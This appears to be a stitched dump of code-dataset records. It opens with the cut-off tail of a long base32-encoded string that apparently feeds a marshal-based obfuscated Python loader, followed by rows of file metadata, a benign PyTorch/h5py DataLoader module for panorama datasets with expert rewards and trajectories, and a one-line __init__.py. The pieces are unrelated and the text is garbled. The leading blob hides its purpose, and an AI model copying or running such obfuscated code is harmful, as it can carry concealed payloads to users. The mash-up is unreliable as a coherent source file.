C4PAYDAXDYGAYFY6BQGB2XGZLSNZQW2ZLULR4DAOC4PAYDAXDYGAYFY6BQGBYGC43TO5XXEZCSLRZFY6BQGBOHQMBQLR4DAMCSLR4DAZK4PAYDAXDYGAYFY6BQGB2FY6BQGNOHQMBQLR4DAMC4PAYDA43ZONJFY6BQMJOHQMBQLR4DAMC4PAYDAUS4PAYTCXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAM24PAYDAXDYGAYFY6BQGBZSAXDYGAYFY6BQGBOHQMBQLR4DANS4PAYDCXDYGA3FY6BQGNOHQMBWLR4DAMK4PAYGMXDYGAYVY6BQMNOHQMBRLR4DAY24PAYDCXDYGBRVY6BQGFOHQMDDLR4DAMK4OROHQMBRLR2FY6BQGJOHQMBVLR4DAMK4PAYTAXDYGAZFY6BQGVOHQMBRLR4DCMK4PAYDCJC4PAYDIXDUGYUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZFY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424OROHQMBQLR4DAMC4PAYDAPDUMVTWC4TJMQ7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGJOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDULR4DAMC4PAYDAXDYGAYDY5DFM5QXE2LEHZ2FY
6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBSLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAMS4PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRFBOHQMBSLR4DAMC4PAYDAXDYGAYHIXDYGA3VY6BQGBOHQMBQLR4DAMDNMFZHG2DBNR2FY6BQGVOHQMBQLR4DAMC4PAYDA3DPMFSHGKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMDTLR2FY6BQGBOHQMBQLR4DAMB4ORSWOYLSNFSD45C4PAYDQXDYGAYFY6BQGBOHQMBQHRWW6ZDVNRST4XDYGAZFY6BQGBOHQMBQLR4DAMDTLR4DAMS4PAYDAXDYGAYFY6BQGBOHQMDDLR4DAMJILR4DAMS4PAYDAXDYGAYFY6BQGB2FY6BQG5OHQMBQLR4DAMC4PAYDA3LBOJZWQYLMOROHQMBVLR4DAMC4PAYDAXDYGAYGY33BMRZSQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDA424OROHQMBQLR4DAMC4PAYDAPDUMVTWC4TJMQ7HIXDYGA4FY6BQGBOHQMBQLR4DAMB4NVXWI5LMMU7FY6BQGJOHQMBQLR4DAMC4PAYDA424PAYDEXDYGAYFY6BQGBOHQMBQLR4DAY24PAYDCKC4PAYDEXDYGAYFY6BQGBOHQMBQOROHQMBXLR4DAMC4PAYDAXDYGAYG2YLSONUGC3DULR4DANK4PAYDAXDYGAYFY6BQGBWG6YLEOMUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQFBOHQMBQLR4DAMC4PAYDAXDYGAYHGXDULR4DAMC4PAYDAXDYGAYDY5DFM5QXE2LEHZ2FY6BQHBOHQMBQLR4DAMC4PAYDAPDNN5SHK3DFHZOHQMBSLR4DAMC4PAYDAXDYGAYHGXDYGAZFY6BQGBOHQMBQLR4DAMC4PAYGGXDYGAYSQXDYGAZFY6BQGBOHQMBQLR4DAMDULR4DAN24PAYDAXDYGAYFY6BQGBWWC4TTNBQWY5C4PAYDKXDYGAYFY6BQGBOHQMBQNRXWCZDTFBOHQMBQLR4DAMC4PAYDAXDYGAYCQXDYGAYFY6BQGBOHQMBQLR4DAMBILR4DAMC4PAYDAXDYGAYFY6BQGBZVY5C4PAYDAXDYGAYFY6BQGA6HIZLHMFZGSZB6OROHQMBYLR4DAMC4PAYDAXDYGAYDY3LPMR2WYZJ6LR4DAMS4PAYDAXDYGAYFY6BQGBZVY6BQGJOHQMBQLR4DAMC4PAYDAXDYGBRVY6BQGEUFY6BQGJOHQMBQLR4DAMC4PAYDA5C4PAYDOXDYGAYFY6BQGBOHQMBQNVQXE43IMFWHIXDYGA2VY6BQGBOHQMBQLR4DAMDMN5QWI4ZILR4DAMC4PAYDAXDYGAYFY6BQGAUFY6BQGBOHQMBQLR4DAMC4PAYDAKC4PAYDAXDYGAYFY6BQGBOHQMBQONOHIXDYGAYFY6BQGBOHQMBQHR2GKZ3BOJUWIPTULR4DAOC4PAYDAXDYGAYFY6BQGA6G233EOVWGKPS4PAYDEXDYGAYFY6BQGBOHQMBQONOHQMBSLR4DAMC4PAYDAXDYGAYFY6BQMNOHQMBRE4USS==='))
| 2,783.666667 | 16,618 | 0.998324 | 18 | 16,702 | 926.222222 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10731 | 0.000718 | 16,702 | 5 | 16,619 | 3,340.4 | 0.891612 | 0.003772 | 0 | 0 | 0 | 0 | 0.997355 | 0.997355 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 10 |
0d6dd301aa4cb72024a11b8a2a18a68ccf0051ff | 23,274 | py | Python | misc/DataLoader.py | srama2512/sidekicks | a5c487bb30540c98f04ece5e2c22ef95963afbdb | ["MIT"] | 26 | 2018-07-30T19:14:49.000Z | 2022-03-12T12:49:36.000Z | misc/DataLoader.py | srama2512/sidekicks | a5c487bb30540c98f04ece5e2c22ef95963afbdb | ["MIT"] | 2 | 2018-12-10T17:12:27.000Z | 2019-07-15T22:47:28.000Z | misc/DataLoader.py | srama2512/sidekicks | a5c487bb30540c98f04ece5e2c22ef95963afbdb | ["MIT"] | 8 | 2018-12-18T00:55:45.000Z | 2019-11-11T18:42:49.000Z |
import h5py
import random
import numpy as np
import pdb
import torch
class DataLoaderSimple(object):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Does not use expert rewards.
"""
def __init__(self, opts):
"""
Loads the dataset and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, h5_path_unseen (optional)
mask_path (optional)
"""
# ---- Load the dataset ----
self.h5_file = h5py.File(opts.h5_path, 'r')
self.data = {}
self.data['train'] = np.array(self.h5_file['train'])
self.data['val'] = np.array(self.h5_file['val'])
self.data['test'] = np.array(self.h5_file['test'])
if 'val_highres' in self.h5_file.keys():
self.data['val_highres'] = np.array(self.h5_file['val_highres'])
self.data['test_highres'] = np.array(self.h5_file['test_highres'])
# ---- Load the unseen classes ----
if opts.h5_path_unseen != '':
h5_file_unseen = h5py.File(opts.h5_path_unseen, 'r')
self.data['test_unseen'] = np.array(h5_file_unseen['test'])
# ---- Save settings needed for batching operations ----
# Dataset statistics
self.train_count = self.h5_file['train'].shape[0]
self.val_count = self.h5_file['val'].shape[0]
self.test_count = self.h5_file['test'].shape[0]
if opts.h5_path_unseen != '':
self.test_unseen_count = self.data['test_unseen'].shape[0]
if hasattr(opts, 'mask_path') and opts.mask_path != '':
mask_file = h5py.File(opts.mask_path, 'r')
self.masks = {}
self.masks['test'] = np.array(mask_file['test_mask'])
if opts.h5_path_unseen != '':
self.masks['test_unseen'] = np.array(mask_file['test_unseen_mask'])
self.hasmasks = True
else:
self.hasmasks = False
self.pano_shape = self.h5_file['train'].shape[1:]
# Iteration tracker
self.train_idx = 0
self.val_idx = 0
self.test_idx = 0
if opts.h5_path_unseen != '':
self.test_unseen_idx = 0
self.batch_size = opts.batch_size
# Shuffle the training data indices and access them in the shuffled order
self.shuffle = opts.shuffle
self.shuffled_idx = list(range(self.h5_file['train'].shape[0]))
if self.shuffle:
random.shuffle(self.shuffled_idx)
# Debug mode
self.debug = opts.debug
self.N = self.data['train'].shape[1]
self.M = self.data['train'].shape[2]
self.C = self.data['train'].shape[3]
self.H = self.data['train'].shape[4]
self.W = self.data['train'].shape[5]
if 'val_highres' in self.data:
self.H_highres = self.data['val_highres'].shape[4]
self.W_highres = self.data['val_highres'].shape[5]  # match H_highres source above; val/test highres share a shape
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, depleted
def next_batch_val(self, highres=False):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = np.array(self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['val_highres'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :])
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
if not highres:
return out, depleted
else:
return out, out_highres, depleted
def next_batch_test(self, highres=False):
"""
Returns the next testing batch
out: BxNxMxCx32x32
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_count - self.test_idx)
out = np.array(self.data['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['test_highres'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.debug:
assert((batch_size == self.batch_size) or (self.test_idx + batch_size == self.test_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.hasmasks:
assert(out_masks.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.test_idx + batch_size == self.test_count:
depleted = True
self.test_idx = 0
else:
depleted = False
self.test_idx = self.test_idx + batch_size
if not highres:
return out, out_masks, depleted
else:
return out, out_highres, out_masks, depleted
def next_batch_test_unseen(self):
"""
Returns the next unseen classes testing batch
out: BxNxMxCx32x32
"""
batch_size = min(self.batch_size, self.test_unseen_count - self.test_unseen_idx)
out = np.array(self.data['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.debug:
assert((batch_size == self.batch_size) or (self.test_unseen_idx + batch_size == self.test_unseen_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.test_unseen_idx + batch_size == self.test_unseen_count:
depleted = True
self.test_unseen_idx = 0
else:
depleted = False
self.test_unseen_idx = self.test_unseen_idx + batch_size
return out, out_masks, depleted
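# Hedged usage sketch (not from the original repo): draining one epoch from
# DataLoaderSimple; `loader` is assumed to be built from an opts object with
# the fields listed in __init__'s docstring (h5_path, shuffle, batch_size, ...).
def _demo_epoch_simple(loader):
    depleted = False
    while not depleted:
        # out is a BxNxMxCx32x32 numpy array per the docstrings above;
        # next_batch_train resets train_idx once the epoch is depleted.
        out, depleted = loader.next_batch_train()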
class DataLoaderExpert(DataLoaderSimple):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert rewards.
"""
def __init__(self, opts):
"""
Loads the dataset, rewards and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, rewards_h5_path
"""
# ---- Load the dataset, save settings ----
super(DataLoaderExpert, self).__init__(opts)
# ---- Load the rewards ----
rewards_file = h5py.File(opts.rewards_h5_path, 'r')
self.rewards = {}
# These are KxNxM arrays containing rewards corresponding to each views of
# all panoramas in the train and val splits
self.rewards['train'] = np.array(rewards_file['train/nms'])
self.rewards['val'] = np.array(rewards_file['val/nms'])
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
out_rewards = self.rewards['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_rewards, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
out_rewards = self.rewards['val'][self.val_idx:(self.val_idx+batch_size), :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_rewards, depleted
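# Hedged sketch mirroring the one above for the expert-reward variant: each
# training batch now pairs panoramas with their per-view rewards slice.
def _demo_epoch_expert(loader):
    depleted = False
    while not depleted:
        # out: BxNxMxCx32x32, out_rewards: BxNxM (see docstrings above).
        out, out_rewards, depleted = loader.next_batch_train()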
class DataLoaderExpertPolicy(DataLoaderSimple):
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert trajectories.
"""
def __init__(self, opts):
"""
Loads the dataset, utility maps and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, utility_h5_path, h5_path_unseen, debug
"""
# ---- Load the dataset, save the settings ----
super(DataLoaderExpertPolicy, self).__init__(opts)
self.trajectories_type = opts.trajectories_type
if opts.trajectories_type == 'utility_maps':
# ---- Load the utility maps ----
utility_file = h5py.File(opts.utility_h5_path, 'r')
self.utility_maps = {}
# These are KxNxMxNxM arrays
for split in utility_file.keys():
self.utility_maps[split] = np.array(utility_file[split]['utility_maps'])
elif opts.trajectories_type == 'expert_trajectories':
# ---- Load the trajectories ----
# {'train': #train_samples x T-1 numpy array, 'val': #val_samples x T-1 numpy array}
self.trajectories = torch.load(opts.utility_h5_path)
else:
raise ValueError('Wrong trajectories_type!')
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)]]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['train'][(i, j)][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_maps, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['val'][self.val_idx:(self.val_idx+batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['val'][(i, j)][self.val_idx:(self.val_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_maps, depleted
def next_batch_test(self, highres=False):
"""
Returns the next testing batch
out: BxNxMxCx32x32
out_masks: ???
out_maps: BxNxMxNxM
out_highres: BxNxMxCx448x448 (optional)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_count - self.test_idx)
out = np.array(self.data['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if highres:
out_highres = np.array(self.data['test_highres'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test'][self.test_idx:(self.test_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['test'][self.test_idx:(self.test_idx+batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
out_maps[(i, j)] = self.trajectories['test'][(i, j)][self.test_idx:(self.test_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.test_idx + batch_size == self.test_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if highres:
assert(out_highres.shape == (batch_size, self.N, self.M, self.C, self.H_highres, self.W_highres))
if self.hasmasks:
assert(out_masks.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.test_idx + batch_size == self.test_count:
depleted = True
self.test_idx = 0
else:
depleted = False
self.test_idx = self.test_idx + batch_size
if not highres:
return out, out_masks, out_maps, depleted
else:
return out, out_highres, out_masks, out_maps, depleted
def next_batch_test_unseen(self):
"""
Returns the next unseen classes testing batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
        out_masks: BxNxMxCx32x32 (None if masks are unavailable)
depleted: is the epoch over?
"""
batch_size = min(self.batch_size, self.test_unseen_count - self.test_unseen_idx)
out = np.array(self.data['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :])
if self.hasmasks:
out_masks = self.masks['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :, :, :, :, :]
else:
out_masks = None
if self.trajectories_type == 'utility_maps':
out_maps = self.utility_maps['test_unseen'][self.test_unseen_idx:(self.test_unseen_idx + batch_size)]
else:
out_maps = {}
for i in range(self.N):
for j in range(self.M):
                    out_maps[(i, j)] = self.trajectories['test_unseen'][(i, j)][self.test_unseen_idx:(self.test_unseen_idx+batch_size), :]
if self.debug:
assert((batch_size == self.batch_size) or (self.test_unseen_idx + batch_size == self.test_unseen_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
if self.trajectories_type == 'utility_maps':
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
else:
assert(len(out_maps.keys()) == self.M * self.N)
assert(out_maps[(0, 0)].shape[0] == batch_size)
if self.test_unseen_idx + batch_size == self.test_unseen_count:
depleted = True
self.test_unseen_idx = 0
else:
depleted = False
self.test_unseen_idx = self.test_unseen_idx + batch_size
return out, out_masks, out_maps, depleted
class DataLoaderExpertBoth(DataLoaderSimple):
# TODO: Need to update trajectories_type here
# TODO: Add next_batch_test with expert trajectories option here
"""
DataLoader class for abstracting the reading, batching and shuffling operations
Uses expert trajectories and rewards.
"""
def __init__(self, opts):
"""
Loads the dataset, utility maps and saves settings needed:
(1) dataset statistics (2) shuffle (3) debug statistics (4) iteration tracker
Opts required: seed, h5_path, shuffle, batch_size, utility_h5_path, rewards_h5_path, h5_path_unseen, debug
"""
# ---- Load the dataset, save the settings ----
super(DataLoaderExpertBoth, self).__init__(opts)
# ---- Load the utility maps and rewards ----
        utility_file = h5py.File(opts.utility_h5_path, 'r')
        rewards_file = h5py.File(opts.rewards_h5_path, 'r')
self.rewards = {}
self.utility_maps = {}
# These are KxNxMxNxM arrays
self.utility_maps['train'] = np.array(utility_file['train/utility_maps'])
self.utility_maps['val'] = np.array(utility_file['val/utility_maps'])
        # These are KxNxM arrays containing rewards corresponding to each view of
        # all panoramas in the train and val splits
self.rewards['train'] = np.array(rewards_file['train/nms'])
self.rewards['val'] = np.array(rewards_file['val/nms'])
def next_batch_train(self):
"""
Returns the next training batch (indexed by self.shuffled_idx and starting at self.train_idx)
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.train_count - self.train_idx)
out = np.array(self.data['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :, :, :, :])
out_maps = self.utility_maps['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)]]
out_rewards = self.rewards['train'][self.shuffled_idx[self.train_idx:(self.train_idx+batch_size)], :, :]
if self.debug:
assert((batch_size == self.batch_size) or (self.train_idx + batch_size == self.train_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.train_idx + batch_size == self.train_count:
depleted = True
self.train_idx = 0
else:
depleted = False
self.train_idx = self.train_idx + batch_size
return out, out_maps, out_rewards, depleted
def next_batch_val(self):
"""
Returns the next validation batch
out: BxNxMxCx32x32
out_maps: BxNxMxNxM
out_rewards: BxNxM
"""
batch_size = min(self.batch_size, self.val_count - self.val_idx)
out = self.data['val'][self.val_idx:(self.val_idx+batch_size), :, :, :, :, :]
out_maps = self.utility_maps['val'][self.val_idx:(self.val_idx+batch_size)]
out_rewards = self.rewards['val'][self.val_idx:(self.val_idx+batch_size)]
if self.debug:
assert((batch_size == self.batch_size) or (self.val_idx + batch_size == self.val_count))
assert(out.shape == (batch_size, self.N, self.M, self.C, self.H, self.W))
assert(out_maps.shape == (batch_size, self.N, self.M, self.N, self.M))
assert(out_rewards.shape == (batch_size, self.N, self.M))
if self.val_idx + batch_size == self.val_count:
depleted = True
self.val_idx = 0
else:
depleted = False
self.val_idx = self.val_idx + batch_size
return out, out_maps, out_rewards, depleted
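# A minimal epoch-loop sketch. The option values below are hypothetical; the
# loader only needs the fields listed in the __init__ docstring above.
if __name__ == '__main__':
    from argparse import Namespace
    opts = Namespace(seed=123, h5_path='data.h5', shuffle=True, batch_size=32,
                     utility_h5_path='utility.h5', rewards_h5_path='rewards.h5',
                     h5_path_unseen='data_unseen.h5', debug=False)
    loader = DataLoaderExpertBoth(opts)
    depleted = False
    while not depleted:
        out, out_maps, out_rewards, depleted = loader.next_batch_train()
        # out:         B x N x M x C x H x W panorama views
        # out_maps:    B x N x M x N x M expert utility maps
        # out_rewards: B x N x M per-view rewards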
| 43.340782
| 139
| 0.593409
| 3,035
| 23,274
| 4.327842
| 0.0514
| 0.10552
| 0.074229
| 0.025124
| 0.859307
| 0.836924
| 0.815836
| 0.806395
| 0.790027
| 0.778759
| 0
| 0.010108
| 0.281602
| 23,274
| 536
| 140
| 43.421642
| 0.775478
| 0.158976
| 0
| 0.791176
| 0
| 0
| 0.036747
| 0
| 0
| 0
| 0
| 0.001866
| 0.138235
| 1
| 0.047059
| false
| 0
| 0.014706
| 0
| 0.117647
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d7508a75b483f9b126cef6158bc6f3affd3618c
| 46
|
py
|
Python
|
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
pyqt_transparent_timer/__init__.py
|
yjg30737/pyqt-transparent-timer
|
6919a92517db62832e1048b1d1afc3f1b8449c11
|
[
"MIT"
] | null | null | null |
from .transparentTimer import TransparentTimer
| 46
| 46
| 0.913043
| 4
| 46
| 10.5
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.065217
| 46
| 1
| 46
| 46
| 0.976744
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
